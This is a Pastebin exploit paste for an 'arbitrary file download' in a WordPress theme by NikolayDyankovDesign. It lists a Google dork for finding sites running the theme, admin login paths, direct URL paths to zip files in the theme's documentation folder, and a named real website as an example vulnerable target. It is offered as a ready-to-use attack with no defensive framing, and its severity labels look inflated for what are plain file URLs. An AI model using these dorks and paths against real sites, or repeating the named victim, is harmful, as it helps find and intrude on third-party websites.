Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #################################################################################################
- # Exploit Title : WordPress NikolayDyankovDesign Themes 2.0 Arbitrary File Download
- # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
- # Date : 08/12/2018
- # Vendor Homepage : pinterest.com/nikolaydyankov/ ~ nikolaydyankovdesign.com ~ semsoft.ca
- # Software Download Link : N/A
- # Tested On : Windows and Linux
- # Category : WebApps
- # Version Information : 1.0 and 2.0
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/wp-content/themes/nikolaydyankovdesign/''
- # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
- CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
- #################################################################################################
- # Admin Panel Login Path :
- /demox/admin/
- /wp-log
- # Exploit :
- /wp-content/themes/nikolaydyankovdesign/documentations/dynamic-grid-the-engine.zip
- /wp-content/themes/nikolaydyankovdesign/documentations/flipper-for-wordpress-2-0.zip
- /wp-content/themes/nikolaydyankovdesign/documentations/flipper.zip
- /wp-content/themes/nikolaydyankovdesign/documentations/rockstar-map-for-wordpress.zip
- /wp-content/themes/nikolaydyankovdesign/documentations/rockstar-map.zip
- /wp-content/themes/nikolaydyankovdesign/documentations/timeliner-for-wordpress.zip
- /wp-content/themes/nikolaydyankovdesign/documentations/timelinexml.zip
- /wp-content/themes/nikolaydyankovdesign/documentations/touch-timeline-for-wordpress.zip
- /wp-content/themes/nikolaydyankovdesign/documentations/touch-timeline.zip
- #################################################################################################
- # Example Vulnerable Site =>
- [+] photobook.com.tr/demox/siparis/wp-content/themes/nikolaydyankovdesign/documentations/dynamic-grid-the-engine.zip
- #################################################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- #################################################################################################
Add Comment
Please, Sign In to add comment